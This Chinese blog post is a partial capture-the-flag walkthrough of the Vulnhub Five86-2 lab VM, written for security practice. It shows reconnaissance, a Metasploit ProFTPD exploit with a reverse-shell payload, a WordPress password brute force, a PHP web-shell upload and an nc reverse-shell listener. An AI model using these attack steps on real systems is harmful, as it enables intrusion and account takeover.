首页 > 其他分享 >Vulnhub之Fivebox 2靶机测试过程(部分)

Vulnhub之Fivebox 2靶机测试过程(部分)

时间:2023-02-23 11:45:26浏览次数:38  
标签:http 56.199 192.168 Detection Fivebox Vulnhub Found 靶机 Aggressive

Fivebox 2

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:e2:ee:06      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.199  08:00:27:45:de:88      1      60  PCS Systemtechnik GmbH

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.199

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.199 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-22 20:48 EST
Nmap scan report for bogon (192.168.56.199)
Host is up (0.00062s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Five86-2 – Just another WordPress site
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:45:DE:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.74 seconds

NMAP扫描结果表明目标主机有2个开放端口:21(FTP)、80(HTTP)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ ftp 192.168.56.199
Connected to 192.168.56.199.
anonymous
220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10]
Name (192.168.56.199:kali): 331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ searchsploit ProFTPd 1.3.5e                                
Exploits: No Results
Shellcodes: No Results
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ searchsploit ProFTPd 1.3.5 
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                        | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)                                    | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                                                  | linux/remote/36742.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

  1. 不允许匿名访问

  2. 可能存在远程命令执行漏洞

    看下是否可以用metasploit相关模块?

    msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options 

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
                                         Metasploit
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.56.199
RHOSTS => 192.168.56.199
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[-] 192.168.56.199:80 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/
set payload cmd/unix/bind_awk            set payload cmd/unix/generic             set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/bind_perl           set payload cmd/unix/reverse_awk         set payload cmd/unix/reverse_python
set payload cmd/unix/bind_perl_ipv6      set payload cmd/unix/reverse_perl        set payload cmd/unix/reverse_python_ssl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options 

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.199   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-
                                         Metasploit
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LhOST 192.168.56.146
LhOST => 192.168.56.146
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 192.168.56.146:5555 
[*] 192.168.56.199:80 - 192.168.56.199:21 - Connected to FTP server
[*] 192.168.56.199:80 - 192.168.56.199:21 - Sending copy commands to FTP server
[-] 192.168.56.199:80 - Exploit aborted due to failure: unknown: 192.168.56.199:21 - Failure copying from /proc/self/cmdline
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) >

浏览器访问80端口,返回页面内容不完整,查看页面源代码可知主机名为

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ cat /etc/hosts 
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.199  five86-2

刷新页面,目标站点为wordpress站点,

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 -e u,p             
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:37:01 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.199/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.199/, Match: 'WordPress 5.1.4'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] barney
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gillian
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] stephen
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Feb 22 21:37:08 2023
[+] Requests Done: 56
[+] Cached Requests: 4
[+] Data Sent: 13.914 KB
[+] Data Received: 147.598 KB
[+] Memory used: 209.285 MB
[+] Elapsed time: 00:00:06
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 -U barney -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:37:44 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.199/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.199/, Match: 'WordPress 5.1.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - barney / spooky1                                                                                                  
Trying barney / slideshows Time: 00:03:18 <                                         > (11615 / 14356007)  0.08%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: barney, Password: spooky1

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Feb 22 21:41:16 2023
[+] Requests Done: 11757
[+] Cached Requests: 28
[+] Data Sent: 5.951 MB
[+] Data Received: 6.859 MB
[+] Memory used: 266.188 MB
[+] Elapsed time: 00:03:31

登录wordpress后台,不过发现barney并不是管理员,看一下能不能破解出admin的密码

但是运行wpscan 15分钟左右仍没有结果,暂时放弃。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 --plugins-detection mixed -e p              
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:59:11 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.199/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.199/, Match: 'WordPress 5.1.4'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <============================================> (1500 / 1500) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.199/wp-content/plugins/akismet/
 | Last Updated: 2022-12-01T17:18:00.000Z
 | Readme: http://192.168.56.199/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.199/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.199/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.199/wp-content/plugins/akismet/readme.txt

[+] user-role-editor
 | Location: http://192.168.56.199/wp-content/plugins/user-role-editor/
 | Last Updated: 2022-12-16T06:14:00.000Z
 | Readme: http://192.168.56.199/wp-content/plugins/user-role-editor/readme.txt
 | [!] The version is out of date, the latest version is 4.63.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.199/wp-content/plugins/user-role-editor/, status: 200
 |
 | Version: 4.52.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.199/wp-content/plugins/user-role-editor/readme.txt
 | Confirmed By: Change Log (Aggressive Detection)
 |  - http://192.168.56.199/wp-content/plugins/user-role-editor/changelog.txt, Match: '4.52.2'

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Feb 22 21:59:20 2023
[+] Requests Done: 1535
[+] Cached Requests: 8
[+] Data Sent: 419.228 KB
[+] Data Received: 348.217 KB
[+] Memory used: 230.359 MB
[+] Elapsed time: 00:00:09

没有扫描出可利用的漏洞

登录barney可以知道wordpress有IEAC插件,可利用该插件上传shell.php,根据要求,可以将shell.php以及任意一个html文件压缩,然后创建post,在post中选择e-learning,然后上传shell1.php,成功上传后,位置在:

/wp-content/uploads/articulate_uploads/shell1/shell.php

在KaliLinux 上成功得到了反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.199] 47942
Linux five86-2 5.3.0-26-generic #28-Ubuntu SMP Wed Dec 18 05:37:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:25:10 up  1:42,  0 users,  load average: 0.08, 0.18, 1.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@five86-2:/$ cd /home
cd /home
www-data@five86-2:/home$ ls -alh
ls -alh

提权

上传linpeas.sh脚本至目标主机,执行该脚本:

Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip

标签:http,56.199,192.168,Detection,Fivebox,Vulnhub,Found,靶机,Aggressive
From: https://www.cnblogs.com/jason-huawen/p/17147375.html

相关文章

  • Vulnhub之Five86 1靶机详细测试过程
    Five861作者:jason_huawen靶机信息名称:five86:1地址:https://www.vulnhub.com/entry/five86-1,417/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Five86_1]└─$s......
  • vulnhub靶场之DRIFTINGBLUES: 9 (FINAL)
    准备:攻击机:虚拟机kali、本机win10。靶机:DriftingBlues:9(final),下载地址:https://download.vulnhub.com/driftingblues/driftingblues9.ova,下载后直接vbox打开即可。知......
  • Vulnhub:ReconForce-01.1靶机
    kali:192.168.111.111靶机:192.168.111.200信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.200访问目标ftp得到提示:Security@hackNos访问......
  • [Vulnhub] CHERRY: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.70x01攻击用Namp扫描靶机开放的端口┌──(root㉿azwhikaru)-[/home/azwhikaru/Desktop]└─#n......
  • [Vulnhub] FIRSTBLOOD: 1
    下载地址0x00配置攻击机IP:192.168.10.5靶机IP:192.168.10.60x01攻击使用Nmap扫描靶机开放的端口┌──(root㉿azwhikaru)-[~]└─#nmap-A192.168.10.6......
  • Vulnhub之Kioptrix Level 2靶机详细测试过程(提权成功)
    KioptrixLevel2识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]└─$sudonetdiscover-ieth1-r10.1.1.0/24Currentlyscanning:10.1.1.0/24......
  • Vulnhub之Kioptrix Level 1靶机详细测试过程(不同的拿shell方法,利用OpenFuck漏洞)
    KioptrixLevel1作者:jason_huawen靶机信息名称:Kioptrix:Level1(#1)地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/识别目标主机IP地址(kali㉿kal......
  • Vulnhub:mhz_c1f靶机
    kali:192.168.111.111靶机:192.168.111.197信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.197目录爆破feroxbuster-k-d1--urlhttp:/......
  • VulnHub-covfefe: 1
    靶机地址:https://www.vulnhub.com/entry/covfefe-1,199/目标:取得3个flag注:由于一直换位置,导致IP有所变化,并非书写错误一、主机发现nmap-sP192.168.31.0/24|gr......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99